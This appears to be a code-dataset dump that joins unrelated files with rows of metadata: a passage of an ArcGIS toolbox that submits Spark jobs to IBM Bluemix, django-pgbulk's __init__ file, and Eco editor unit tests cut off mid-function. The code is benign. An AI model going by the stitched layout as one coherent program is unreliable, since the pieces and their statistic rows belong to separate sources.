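The part files are then matched as objects whose names start with `name + "/part"`, i.e. `GeoBins/part-00000` and so on.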
    def execute(self, parameters, messages):
        bm_path = parameters[1].valueAsText
        inp_path = parameters[2].valueAsText
        out_path = parameters[3].valueAsText
        bin_size = parameters[4].valueAsText
        del_work = parameters[5].value
        with open(bm_path) as bm_file:
            bluemix = json.load(bm_file)
        epoch = int(time.time())
        spark = bluemix["spark"]
        storage = bluemix["storage"]
        url = "https://spark.bluemix.net/v1/submissions/create"
        headers = {"X-Requested-With": "spark-submit"}
        data = {
            "action": "CreateSubmissionRequest",
            "appArgs": [
                "--primary-py-file",
                "GeoBin.py"
            ],
            "appResource": "{}/GeoBin.py".format(spark["instance_id"]),
            "clientSparkVersion": "2.0",
            "mainClass": "org.apache.spark.deploy.PythonRunner",
            "sparkProperties": {
                "spark.app.name": "GeoBin{}".format(epoch),
                "spark.files": "{}/GeoBin.py".format(spark["instance_id"]),
                "spark.service.spark_version": "2.0",
                "spark.service.tenant_id": spark["tenant_id"],
                "spark.service.instance_id": spark["instance_id"],
                "spark.service.tenant_secret": spark["tenant_secret"],
                "spark.service.user.fs.swift2d.impl": "com.ibm.stocator.fs.ObjectStoreFileSystem",
                "spark.service.user.fs.swift2d.service.thunder.auth.method": "keystoneV3",
                "spark.service.user.fs.swift2d.service.thunder.auth.endpoint.prefix": "endpoints",
                "spark.service.user.fs.swift2d.service.thunder.auth.url": storage["auth_url"] + "/v3/auth/tokens",
                "spark.service.user.fs.swift2d.service.thunder.region": storage["region"],
                "spark.service.user.fs.swift2d.service.thunder.tenant": storage["projectId"],
                "spark.service.user.fs.swift2d.service.thunder.username": storage["userId"],
                "spark.service.user.fs.swift2d.service.thunder.password": storage["password"],
                "spark.service.user.fs.swift2d.service.thunder.public": "true",
                "spark.service.user.input.path": inp_path,
                "spark.service.user.output.path": out_path,
                "spark.service.user.cell.size": bin_size
            }
        }
        r = requests.post(url,
                          headers=headers,
                          json=data
                          )
        resp = r.json()
        text = json.dumps(resp)
        if "success" in resp and resp["success"]:
            if False:  # debug toggle: dump the raw submission response to disk
                with open(os.path.join(os.path.dirname(__file__), "submit-res.json"), "w") as f:
                    f.write(text)
            spark["submissionId"] = resp["submissionId"]
            self.spark = spark
            self.storage = storage
            self.running = True
            for resp in self.check_status():
                arcpy.AddMessage(json.dumps(resp))
            if resp["success"]:
                self.import_bins(parameters)
                if del_work:
                    self.del_workdir()
        else:
            arcpy.AddError(text)
class StatusTool(object):
    def __init__(self):
        self.label = "GeoBin Status"
        self.description = "GeoBin Status"
        self.canRunInBackground = True
    def getParameterInfo(self):
        bm_path = arcpy.Parameter(
            name="bm_path",
            displayName="Bluemix JSON Path",
            direction="Input",
            datatype="File",
            parameterType="Required")
        bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
        submit_path = arcpy.Parameter(
            name="submit_path",
            displayName="Submit File",
            direction="Input",
            datatype="File",
            parameterType="Required")
        submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
        return [bm_path, submit_path]
    def isLicensed(self):
        return True
    def updateParameters(self, parameters):
        return
    def updateMessages(self, parameters):
        return
    def execute(self, parameters, messages):
        bm_path = parameters[0].valueAsText
        submit_path = parameters[1].valueAsText
        with open(bm_path) as bm_file:
            bluemix = json.load(bm_file)
        spark = bluemix["spark"]
        with open(submit_path) as submit_file:
            submit = json.load(submit_file)
        headers = {"X-Requested-With": "spark-submit"}
        data = {
            "sparkProperties": {
                "spark.service.tenant_id": spark["tenant_id"],
                "spark.service.instance_id": spark["instance_id"],
                "spark.service.tenant_secret": spark["tenant_secret"],
                "spark.service.spark_version": "2.0"
            }
        }
        r = requests.get("https://spark.bluemix.net/v1/submissions/status/" + submit["submissionId"],
                         headers=headers,
                         json=data
                         )
        text = json.dumps(r.json())
        arcpy.AddMessage(text)
        with open(os.path.join(os.path.dirname(__file__), "status.json"), "w") as f:
            f.write(text)
class DeleteWorkdirTool(object):
    def __init__(self):
        self.label = "Delete Work Dir"
        self.description = "Delete Work Dir"
        self.canRunInBackground = True
    def getParameterInfo(self):
        bm_path = arcpy.Parameter(
            name="bm_path",
            displayName="Bluemix JSON Path",
            direction="Input",
            datatype="File",
            parameterType="Required")
        bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
        submit_path = arcpy.Parameter(
            name="submit_path",
            displayName="Submit File",
            direction="Input",
            datatype="File",
            parameterType="Required")
        submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
        return [bm_path, submit_path]
    def isLicensed(self):
        return True
    def updateParameters(self, parameters):
        return
    def updateMessages(self, parameters):
        return
    def execute(self, parameters, messages):
        bm_path = parameters[0].valueAsText
        submit_path = parameters[1].valueAsText
        with open(bm_path) as bm_file:
            bluemix = json.load(bm_file)
        spark = bluemix["spark"]
        with open(submit_path) as submit_file:
            submit = json.load(submit_file)
        url = "https://spark.bluemix.net/tenant/data/workdir/" + submit["submissionId"]
        headers = {
            "X-Spark-service-instance-id": spark["instance_id"]
        }
        r = requests.delete(url,
                            auth=(spark["tenant_id"], spark["tenant_secret"]),
                            headers=headers
                            )
        resp = r.json()
        if "file_error" in resp:
            arcpy.AddWarning(json.dumps(resp))
        else:
            arcpy.AddMessage(json.dumps(resp))
class DownloadFileTool(object):
    def __init__(self):
        self.label = "Download Debug Files"
        self.description = "Download Debug Files"
        self.canRunInBackground = True
    def getParameterInfo(self):
        bm_path = arcpy.Parameter(
            name="bm_path",
            displayName="Bluemix JSON Path",
            direction="Input",
            datatype="File",
            parameterType="Required")
        bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
        submit_path = arcpy.Parameter(
            name="submit_path",
            displayName="Submit File",
            direction="Input",
            datatype="File",
            parameterType="Required")
        submit_path.value = os.path.join(os.path.dirname(__file__), "submit-res.json")
        err_out = arcpy.Parameter(
            name="err_out",
            displayName="File Type",
            direction="Input",
            datatype="String",
            parameterType="Required")
        err_out.value = "stderr"
        err_out.filter.type = "ValueList"
        err_out.filter.list = ["stderr", "stdout"]
        return [bm_path, submit_path, err_out]
    def isLicensed(self):
        return True
    def updateParameters(self, parameters):
        return
    def updateMessages(self, parameters):
        return
    def execute(self, parameters, messages):
        bm_path = parameters[0].valueAsText
        submit_path = parameters[1].valueAsText
        err_out = parameters[2].valueAsText
        with open(bm_path) as bm_file:
            bluemix = json.load(bm_file)
        spark = bluemix["spark"]
        with open(submit_path) as submit_file:
            submit = json.load(submit_file)
        url = "https://spark.bluemix.net/tenant/data/workdir/" + submit["submissionId"] + "/" + err_out
        headers = {
            "X-Spark-service-instance-id": spark["instance_id"]
        }
        r = requests.get(url,
                         auth=(spark["tenant_id"], spark["tenant_secret"]),
                         headers=headers
                         )
        with open(os.path.join(os.path.dirname(__file__), err_out + ".txt"), "w") as open_file:
            open_file.write(r.text)
class SubmitTool(object):
    def __init__(self):
        self.wait_try = 0
        self.wait_max = 30
        self.wait_sec = 7
        self.running = True
        self.spark = {}
        self.storage = {}
        self.label = "GeoBin Submit"
        self.description = "GeoBin Submit"
        self.canRunInBackground = True
    def getParameterInfo(self):
        out_fc = arcpy.Parameter(
            name="out_fc",
            displayName="out_fc",
            direction="Output",
            datatype="Feature Layer",
            parameterType="Derived")
        out_fc.symbology = os.path.join(os.path.dirname(__file__), "GeoBin.lyrx")
        bm_path = arcpy.Parameter(
            name="bm_path",
            displayName="Bluemix JSON Path",
            direction="Input",
            datatype="File",
            parameterType="Required")
        bm_path.value = os.path.join(os.path.dirname(__file__), "bluemix.json")
        input_path = arcpy.Parameter(
            name="input_path",
            displayName="Swift Input Path",
            direction="Input",
            datatype="String",
            parameterType="Required")
        input_path.value = "swift2d://trips.thunder/trips-1M.csv"
        output_path = arcpy.Parameter(
            name="output_path",
            displayName="Swift Output Path",
            direction="Input",
            datatype="String",
            parameterType="Required")
        output_path.value = "swift2d://output.thunder/GeoBins"
        bin_size = arcpy.Parameter(
            name="bin_size",
            displayName="Bin Size",
            direction="Input",
            datatype="String",
            parameterType="Required")
        bin_size.value = "0.001"
        return [out_fc, bm_path, input_path, output_path, bin_size]
    def isLicensed(self):
        return True
    def updateParameters(self, parameters):
        return
    def updateMessages(self, parameters):
        return
    def execute(self, parameters, messages):
        bm_path = parameters[1].valueAsText
        inp_path = parameters[2].valueAsText
        out_path = parameters[3].valueAsText
        bin_size = parameters[4].valueAsText
        with open(bm_path) as bm_file:
            bluemix = json.load(bm_file)
        epoch = int(time.time())
        spark = bluemix["spark"]
        storage = bluemix["storage"]
        url = "https://spark.bluemix.net/v1/submissions/create"
        headers = {"X-Requested-With": "spark-submit"}
        data = {
            "action": "CreateSubmissionRequest",
            "appArgs": [
                "--primary-py-file",
                "GeoBin.py"
            ],
            "appResource": "{}/GeoBin.py".format(spark["instance_id"]),
            "clientSparkVersion": "2.0",
            "mainClass": "org.apache.spark.deploy.PythonRunner",
            "sparkProperties": {
                "spark.app.name": "GeoBin{}".format(epoch),
                "spark.files": "{}/GeoBin.py".format(spark["instance_id"]),
                "spark.service.spark_version": "2.0",
                "spark.service.tenant_id": spark["tenant_id"],
                "spark.service.instance_id": spark["instance_id"],
                "spark.service.tenant_secret": spark["tenant_secret"],
                "spark.service.user.fs.swift2d.impl": "com.ibm.stocator.fs.ObjectStoreFileSystem",
                "spark.service.user.fs.swift2d.service.thunder.auth.method": "keystoneV3",
                "spark.service.user.fs.swift2d.service.thunder.auth.endpoint.prefix": "endpoints",
                "spark.service.user.fs.swift2d.service.thunder.auth.url": storage["auth_url"] + "/v3/auth/tokens",
                "spark.service.user.fs.swift2d.service.thunder.region": storage["region"],
                "spark.service.user.fs.swift2d.service.thunder.tenant": storage["projectId"],
                "spark.service.user.fs.swift2d.service.thunder.username": storage["userId"],
                "spark.service.user.fs.swift2d.service.thunder.password": storage["password"],
                "spark.service.user.fs.swift2d.service.thunder.public": "true",
                "spark.service.user.input.path": inp_path,
                "spark.service.user.output.path": out_path,
                "spark.service.user.cell.size": bin_size
            }
        }
        with open(os.path.join(os.path.dirname(__file__), "submit-req.json"), "w") as f:
            f.write(json.dumps(data))
        r = requests.post(url,
                          headers=headers,
                          json=data
                          )
        resp = r.json()
        text = json.dumps(resp)
        if "success" in resp and resp["success"]:
            arcpy.AddMessage(text)
            with open(os.path.join(os.path.dirname(__file__), "submit-res.json"), "w") as f:
                f.write(text)
        else:
            arcpy.AddError(text)
| 37.344147 | 114 | 0.530838 | 2,600 | 26,477 | 5.258846 | 0.101154 | 0.021063 | 0.028085 | 0.017553 | 0.817377 | 0.804286 | 0.788927 | 0.77174 | 0.761208 | 0.75448 | 0 | 0.005583 | 0.350606 | 26,477 | 708 | 115 | 37.396893 | 0.789636 | 0 | 0 | 0.729642 | 0 | 0 | 0.203006 | 0.07667 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086319 | false | 0.004886 | 0.016287 | 0.039088 | 0.169381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c90795b812ede89767809ec0cb8846eefccaaecf | 132 | py | Python | pgbulk/__init__.py | jyveapp/django-pgbulk | cbd99f46e865d6037b36e50aad900acb09818278 | [
"BSD-3-Clause"
] | 12 | 2020-06-27T14:03:06.000Z | 2020-10-04T02:12:04.000Z | pgbulk/__init__.py | jyveapp/django-pgbulk | cbd99f46e865d6037b36e50aad900acb09818278 | [
"BSD-3-Clause"
] | 1 | 2021-12-24T05:11:37.000Z | 2022-01-08T02:49:52.000Z | pgbulk/__init__.py | Opus10/django-pgbulk | 0e18cf9e6c407ccff07dafaadb65082ca6cb8fe6 | [
"BSD-3-Clause"
] | 2 | 2021-06-29T19:27:22.000Z | 2021-09-28T10:52:54.000Z | from pgbulk.core import sync
from pgbulk.core import update
from pgbulk.core import upsert
__all__ = ['update', 'upsert', 'sync']
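django-pgbulk's `upsert` is built on PostgreSQL's `INSERT ... ON CONFLICT DO UPDATE`. As a rough illustration of the statement such a call amounts to, here is a plain string-construction sketch (this is not pgbulk's implementation, which builds and parameterises the query through the Django ORM; `upsert_sql` and its arguments are hypothetical):

```python
def upsert_sql(table, columns, unique_cols, update_cols):
    """Render a PostgreSQL-style upsert statement (illustrative only)."""
    cols = ", ".join(columns)
    placeholders = ", ".join("%s" for _ in columns)
    conflict = ", ".join(unique_cols)
    updates = ", ".join("{0} = EXCLUDED.{0}".format(c) for c in update_cols)
    return ("INSERT INTO {} ({}) VALUES ({}) "
            "ON CONFLICT ({}) DO UPDATE SET {}").format(
        table, cols, placeholders, conflict, updates)

sql = upsert_sql("account", ["id", "name"], ["id"], ["name"])
print(sql)
```

`EXCLUDED` refers to the row that would have been inserted, so conflicting rows are updated in place in a single round trip, which is what makes bulk upserts cheaper than per-row `get_or_create` loops.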
| 18.857143 | 38 | 0.75 | 19 | 132 | 5 | 0.421053 | 0.315789 | 0.442105 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143939 | 132 | 6 | 39 | 22 | 0.840708 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c914af76f26c261c83682a89d270203b0a9ffb2a | 182,203 | py | Python | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 54 | 2015-01-19T14:54:28.000Z | 2022-02-06T14:55:03.000Z | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 228 | 2015-01-27T15:53:13.000Z | 2020-01-16T10:35:15.000Z | lib/eco/test/test_eco.py | softdevteam/eco | fdca886f13e9487f8293f50bf1fd5f02389e0fd3 | [
"MIT"
] | 12 | 2015-05-15T01:49:01.000Z | 2020-01-11T10:19:39.000Z | # Copyright (c) 2012--2014 King's College London
# Created by the Software Development Team <http://soft-dev.org/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from grammars.grammars import lang_dict, Language
from treemanager import TreeManager
from incparser.incparser import IncParser
from inclexer.inclexer import IncrementalLexer, IncrementalLexerCF
from incparser.astree import BOS, EOS, TextNode, MultiTextNode
from grammar_parser.gparser import MagicTerminal, Terminal
from utils import KEY_UP as UP, KEY_DOWN as DOWN, KEY_LEFT as LEFT, KEY_RIGHT as RIGHT
from PyQt5 import QtCore
from . import programs
import pytest
slow = pytest.mark.slow
calc = lang_dict["Basic Calculator"]
java = lang_dict["Java"]
python = lang_dict["Python 2.7.5"]
lua = lang_dict["Lua 5.3"]
sql = lang_dict["SQL (Dummy)"]
pythonprolog = lang_dict["Python + Prolog"]
phppython = lang_dict["PHP + Python"]
pythonphp = lang_dict["Python + PHP"]
pythonhtmlsql = lang_dict["Python + HTML + SQL"]
html = lang_dict["HTML"]
class Test_Typing:
    def setup_class(cls):
        parser, lexer = calc.load()
        cls.lexer = lexer
        cls.parser = parser
        cls.parser.init_ast()
        cls.ast = cls.parser.previous_version
        cls.treemanager = TreeManager()
        cls.treemanager.add_parser(cls.parser, cls.lexer, calc.name)
        cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
    def reset(self):
        self.parser.reset()
        self.treemanager = TreeManager()
        self.treemanager.add_parser(self.parser, self.lexer, calc.name)
        self.treemanager.set_font_test(7, 17)
    def test_normaltyping(self):
        assert self.parser.last_status == False
        self.treemanager.key_normal("1")
        assert self.parser.last_status == True
        self.treemanager.key_normal("+")
        assert self.parser.last_status == False
        self.treemanager.key_normal("2")
        assert self.parser.last_status == True
    def test_cursormovement1(self):
        self.treemanager.key_home()
        assert isinstance(self.treemanager.cursor.node, BOS)
        self.treemanager.cursor_movement(RIGHT)
        assert self.treemanager.cursor.node.symbol.name == "1"
        self.treemanager.key_end()
        assert self.treemanager.cursor.node.symbol.name == "2"
    def test_normaltyping2(self):
        self.treemanager.key_normal("\r")
        assert self.treemanager.cursor.node.symbol.name == "\r"
        self.treemanager.key_normal("3")
        assert self.treemanager.cursor.node.symbol.name == "3"
        self.treemanager.key_normal("+")
        assert self.treemanager.cursor.node.symbol.name == "+"
        self.treemanager.key_normal("5")
        assert self.treemanager.cursor.node.symbol.name == "5"
    def test_cursormovement2(self):
        assert self.treemanager.cursor.node.symbol.name == "5"
        self.treemanager.key_end()
        assert self.treemanager.cursor.node.symbol.name == "5"
        self.treemanager.cursor_movement(UP)
        assert self.treemanager.cursor.node.symbol.name == "2"
        self.treemanager.cursor_movement(LEFT)
        assert self.treemanager.cursor.node.symbol.name == "+"
        self.treemanager.cursor_movement(DOWN)
        assert self.treemanager.cursor.node.symbol.name == "+"
    def test_deletion(self):
        import pytest
        self.treemanager.key_end()
        assert self.treemanager.cursor.node.symbol.name == "5"
        self.treemanager.key_backspace()
        assert self.treemanager.cursor.node.symbol.name == "+"
        self.treemanager.key_delete()
        assert self.treemanager.cursor.node.symbol.name == "+"
        self.treemanager.cursor_movement(LEFT)
        self.treemanager.key_delete()
        assert self.treemanager.cursor.node.symbol.name == "3"
    def test_cursor_reset(self):
        self.treemanager.cursor_reset()
        assert isinstance(self.treemanager.cursor.node, BOS)
    def test_delete_selection(self):
        self.reset()
        self.treemanager.key_normal("a")
        self.treemanager.key_shift()
        self.treemanager.key_cursors(LEFT, shift=True)
        assert self.treemanager.hasSelection()
        nodes, _, _ = self.treemanager.get_nodes_from_selection()
        self.treemanager.key_delete()
    def test_paste(self):
        self.reset()
        assert self.parser.last_status == False
        self.treemanager.pasteText("1 + 2\r+4+5\r+6+789")
        assert self.parser.last_status == True
        assert self.treemanager.cursor.node.symbol.name == "789"
        assert self.treemanager.cursor.pos == 3
    def test_colon_colon_equals(self):
        # typing colon colon equals makes the cursor disappear
        grammar = Language("grammar with colon",
            """
                S ::= "a" "assign" "b"
            """,
            """
                "a":a
                "b":b
                "::=":assign
                ":":colon
                "=":equal
            """)
        names = ["a", "b", "assign", "colon", "equal"]
        regex = ["a", "b", "::=", ":", "="]
        lexer = IncrementalLexerCF()
        lexer.from_name_and_regex(names, regex)
        parser = IncParser(grammar.grammar, 1, True)
        parser.init_ast()
        ast = parser.previous_version
        treemanager = TreeManager()
        treemanager.add_parser(parser, lexer, grammar.name)
        treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
        treemanager.key_normal(":")
        assert treemanager.cursor.node.lookup == "colon"
        assert treemanager.cursor.node.symbol.name == ":"
        assert treemanager.cursor.node.lookahead == 1
        treemanager.key_normal(":")
        assert treemanager.cursor.node.lookup == "colon"
        assert treemanager.cursor.node.symbol.name == ":"
        assert treemanager.cursor.node.lookahead == 1
        treemanager.key_normal("=")
        assert treemanager.cursor.node.lookup == "assign"
        assert treemanager.cursor.node.symbol.name == "::="
    def test_fix_cursor_bug(self):
        grammar = Language("bug",
            """
                S ::= "brack" "htm"
                    | "html"
            """,
            """
                "<":brack
                "htm":htm
                "<html":html
            """)
        names = ["html", "htm", "brack"]
        regex = ["<html", "htm", "<"]
        lexer = IncrementalLexerCF()
        lexer.from_name_and_regex(names, regex)
        parser = IncParser(grammar.grammar, 1, True)
        parser.init_ast()
        ast = parser.previous_version
        treemanager = TreeManager()
        treemanager.add_parser(parser, lexer, grammar.name)
        treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
        treemanager.key_normal("<")
        assert treemanager.cursor.node.symbol.name == "<"
        assert treemanager.cursor.node.lookahead == 1
        treemanager.key_normal("h")
        treemanager.key_normal("t")
        treemanager.key_normal("m")
        assert treemanager.cursor.node.symbol.name == "htm"
        treemanager.key_normal("l")
        assert treemanager.cursor.node.symbol.name == "<html"
        treemanager.key_backspace()
        assert treemanager.cursor.node.symbol.name == "htm"
from grammars.grammars import EcoFile
class Test_General:
    def test_undo_bug(self):
        # Sometimes grammar changes can change subtrees that haven't been marked
        # as changed. As a consequence they are not marked with a version and
        # won't be reverted during an undo. This tests the fix in
        # incparser:reduce that version marks nodes whose parent has changed
        # during reparsing.
        grm = EcoFile("Undotest", "test/undobug1.eco", "Undo")
        t = TreeManager()
        parser, lexer = grm.load()
        t.add_parser(parser, lexer, python.name)
        t.key_normal("a")
        t.undo_snapshot()
        t.key_normal("b")
        t.undo_snapshot()
        t.key_normal("c")
        t.undo_snapshot()
        assert parser.last_status == True
        c = t.cursor.node
        assert c.symbol.name == "c"
        cp = c.parent
        t.key_cursors(LEFT)
        t.key_cursors(LEFT)
        t.key_normal("x")
        t.undo_snapshot()
        assert parser.last_status == True
        assert c.parent is not cp
        t.key_ctrl_z()
        assert parser.last_status == True
        assert c.parent is cp
    def test_load_file_with_error(self):
        t = TreeManager()
        from jsonmanager import JsonManager
        manager = JsonManager()
        language_boxes = manager.load("test/calcerror.eco")
        t.load_file(language_boxes)
        parser = t.get_mainparser()
        t.key_home()
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        t.key_delete()
        assert parser.last_status is False
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        t.key_delete()
        assert parser.last_status is True
    def test_lexing_save_load_bug(self):
        t = TreeManager()
        from jsonmanager import JsonManager
        manager = JsonManager()
        language_boxes = manager.load("test/range_lex_bug.eco")
        t.load_file(language_boxes)
        parser = t.get_mainparser()
        t.key_home()
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        t.key_cursors(RIGHT)
        assert t.cursor.node.symbol.name == "range"
        t.key_delete()
        assert t.cursor.node.symbol.name == "rangex"
class Test_Helper:
    def reset(self):
        self.parser.reset()
        self.treemanager = TreeManager()
        self.treemanager.add_parser(self.parser, self.lexer, python.name)
        self.treemanager.set_font_test(7, 17)
    def view(self):
        import pgviewer
        pgviewer.debug(self.treemanager)
    def move(self, direction, times):
        for i in range(times): self.treemanager.cursor_movement(direction)
    def tree_compare(self, node1, node2):
        # XXX: test references (next_term, parent, lookup)
        while True:
            assert node1.symbol == node2.symbol
            if node1.right:
                assert node1.right.symbol == node2.right.symbol
            if node1.next_term:
                assert node1.next_term.symbol == node2.next_term.symbol
            if isinstance(node1.symbol, MagicTerminal):
                self.tree_compare(node1.symbol.ast, node2.symbol.ast)
            if isinstance(node1, EOS) and isinstance(node2, EOS):
                break
            node1 = self.next_node(node1)
            node2 = self.next_node(node2)
    def next_node(self, node):
        if node.children:
            return node.children[0]
        while node.right_sibling() is None:
            node = node.parent
        return node.right_sibling()
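`next_node` is a pre-order successor function: descend to the first child if there is one, otherwise climb until some ancestor has a right sibling. The traversal can be demonstrated with a minimal stand-in node class (the `Node` class below is hypothetical, modelling just the `children`/`parent`/`right_sibling()` surface the helper relies on):

```python
class Node(object):
    """Minimal stand-in for astree nodes."""
    def __init__(self, name, children=None):
        self.name = name
        self.parent = None
        self.children = children or []
        for c in self.children:
            c.parent = self

    def right_sibling(self):
        siblings = self.parent.children
        i = siblings.index(self)
        return siblings[i + 1] if i + 1 < len(siblings) else None

def next_node(node):
    # Pre-order successor: descend first, otherwise climb until a
    # right sibling exists.
    if node.children:
        return node.children[0]
    while node.right_sibling() is None:
        node = node.parent
    return node.right_sibling()

#        root
#       /    \
#      a      d
#     / \
#    b   c
root = Node("root", [Node("a", [Node("b"), Node("c")]), Node("d")])
order = []
n = root
while True:
    order.append(n.name)
    if n.name == "d":  # last node in pre-order for this tree
        break
    n = next_node(n)
print(order)  # ['root', 'a', 'b', 'c', 'd']
```

In `tree_compare`, the loop terminates at the EOS sentinel instead, so the climb in `next_node` never runs past the root.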
class Test_Compare(Test_Helper):
    def test_compare(self):
        t = TreeManager()
        parser, lexer = python.load()
        t.add_parser(parser, lexer, python.name)
        inputstring = "class Test:\r def x():\r pass\r"
        t.import_file(inputstring)
        self.tree_compare(parser.previous_version.parent, parser.previous_version.parent)
    def test_compare2(self):
        t1 = TreeManager()
        parser1, lexer1 = python.load()
        t1.add_parser(parser1, lexer1, python.name)
        inputstring = "class Test:\r def x():\r pass\r"
        t1.import_file(inputstring)
        t2 = TreeManager()
        parser2, lexer2 = python.load()
        t2.add_parser(parser2, lexer2, python.name)
        inputstring = "class Test:\r def x():\r pass\r"
        t2.import_file(inputstring)
        self.tree_compare(parser1.previous_version.parent, parser2.previous_version.parent)
    def test_compare3(self):
        t1 = TreeManager()
        parser1, lexer1 = python.load()
        t1.add_parser(parser1, lexer1, python.name)
        inputstring = "class Test:\r def x():\r pass\r"
        t1.import_file(inputstring)
        t2 = TreeManager()
        parser2, lexer2 = python.load()
        t2.add_parser(parser2, lexer2, python.name)
        inputstring = "class Test:\r def y():\r pass\r"
        t2.import_file(inputstring)
        with pytest.raises(AssertionError):
            self.tree_compare(parser1.previous_version.parent, parser2.previous_version.parent)
class Test_Python(Test_Helper):
    def setup_class(cls):
        parser, lexer = python.load()
        cls.lexer = lexer
        cls.parser = parser
        cls.parser.init_ast()
        cls.ast = cls.parser.previous_version
        cls.treemanager = TreeManager()
        cls.treemanager.add_parser(cls.parser, cls.lexer, python.name)
        cls.treemanager.set_font_test(7, 17) # hard coded. PyQt segfaults in test suite
class Test_Boogie(Test_Python):
    def test_simple(self):
        for c in "class X:\r p":
            self.treemanager.key_normal(c)
class Test_Bugs(Test_Python):
    def test_bug_goto(self):
        inputstring = "class Test:\r def x():\r pass\r"
        for c in inputstring:
            self.treemanager.key_normal(c)
        for i in range(4): self.treemanager.key_backspace() # remove whitespace (unindent)
        inputstring = "def y():"
        for c in inputstring:
            self.treemanager.key_normal(c)
        assert self.treemanager.cursor.node.symbol.name == ":"
        for i in range(8):
            self.treemanager.key_backspace() # shouldn't throw AssertionError goto != None
    def test_bug_goto2(self):
        self.reset()
        inputstring = "class Test:\r def x():\r print()\r"
        for c in inputstring:
            self.treemanager.key_normal(c)
        inputstring = "br"
        for c in inputstring:
            self.treemanager.key_normal(c)
        assert self.treemanager.cursor.node.symbol.name == "br"
        self.treemanager.key_backspace()
        self.treemanager.key_backspace() # shouldn't throw AssertionError goto != None
    def test_last_line_nonlogical(self):
        self.reset()
        inputstring = "class Test:\r pass"
        for c in inputstring:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
        self.treemanager.key_normal("\r")
        assert self.parser.last_status == True
        self.treemanager.key_backspace()
        self.treemanager.key_backspace()
        self.treemanager.key_backspace()
        self.treemanager.key_backspace()
        assert self.parser.last_status == True
    def test_type_and_remove(self):
        self.reset()
        self.treemanager.key_normal("c")
        self.treemanager.key_backspace() # shouldn't throw IndexError in repair_indentations
    def test_delete_all(self):
        self.reset()
        source = "x = 1"
        for c in source:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
        for c in source:
            self.treemanager.key_backspace()
        assert self.parser.last_status == True
        for c in source:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
    def test_select_and_paste(self):
        self.reset()
        source = "pass"
        for c in source:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
        self.treemanager.key_end()
        self.treemanager.key_shift()
        self.treemanager.key_cursors(LEFT, True)
        self.treemanager.key_cursors(LEFT, True)
        self.treemanager.key_cursors(LEFT, True)
        self.treemanager.key_cursors(LEFT, True)
        self.treemanager.pasteText("back")
        assert self.treemanager.export_as_text() == "back"
        self.treemanager.key_home()
        self.treemanager.key_shift()
        self.treemanager.key_cursors(RIGHT, True)
        self.treemanager.key_cursors(RIGHT, True)
        self.treemanager.key_cursors(RIGHT, True)
        self.treemanager.key_cursors(RIGHT, True)
        self.treemanager.pasteText("again")
        assert self.treemanager.export_as_text() == "again"
        self.move(LEFT, 2)
        self.treemanager.doubleclick_select()
        self.treemanager.pasteText("test")
        assert self.treemanager.export_as_text() == "test"
class Test_Indentation(Test_Python):
    def test_indentation(self):
        assert self.parser.last_status == True
        inputstring = "class Test:\r def x():\r return x"
        for c in inputstring:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
        self.treemanager.key_normal("\r")
        assert self.treemanager.cursor.node.symbol.name == " "
        self.treemanager.key_backspace() # beware of auto indent
        self.treemanager.key_backspace()
        self.treemanager.key_backspace()
        self.treemanager.key_backspace()
        inputstring = "def y():\r pass"
        for c in inputstring:
            self.treemanager.key_normal(c)
        assert self.parser.last_status == True
    def test_indentation_tokens(self):
        def check_next_nodes(node, l):
            for name in l:
                node = node.next_term
                assert node.symbol.name == name
